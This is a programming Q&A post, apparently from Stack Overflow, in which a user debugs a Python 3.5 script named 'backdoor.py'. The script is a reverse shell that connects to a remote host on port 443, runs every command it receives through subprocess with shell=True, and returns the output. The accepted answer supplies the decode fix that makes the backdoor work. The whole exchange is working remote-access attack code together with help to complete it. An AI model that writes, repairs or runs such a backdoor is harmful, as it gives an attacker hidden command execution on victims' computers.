# Python3.5 TypeError: argument of type 'int' is not iterable Backdoor

Tags: python, int, python-3.5

Python3.5 TypeError: argument of type 'int' is not iterable Backdoor

I get this error:

```
Traceback (most recent call last):
File "E:\Users\x\Desktop\backdoor.py", line 13, in <module>
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
File "E:\Users\x\AppData\Local\Programs\Python\Python35-32\lib\subprocess.py", line 950, in __init__
restore_signals, start_new_session)
File "E:\Users\x\AppData\Local\Programs\Python\Python35-32\lib\subprocess.py", line 1194, in _execute_child
args = list2cmdline(args)
File "E:\Users\x\AppData\Local\Programs\Python\Python35-32\lib\subprocess.py", line 754, in list2cmdline
needquote = (" " in arg) or ("\t" in arg) or not arg
TypeError: argument of type 'int' is not iterable
```

Every time when I run, connect and type IP config in my console. Here is the script:

```
#!/usr/bin/python

import socket,subprocess
HOST = '192.168.1.13'
PORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(('[*] Connection Established!').encode())

while 1:
     data = s.recv(1024)
     if data == "quit": break
     proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
     stdoutput = proc.stdout.read() + proc.stderr.read()
     s.send((stdoutput).encode())

s.close()
```

Answer (score 1, accepted):

You are reading binary data from the socket, then treating it as a string object. Just like sending data requires `.encode()`, reading it (as a string) requires `.decode()`.

```
data = s.recv(1024).decode()
```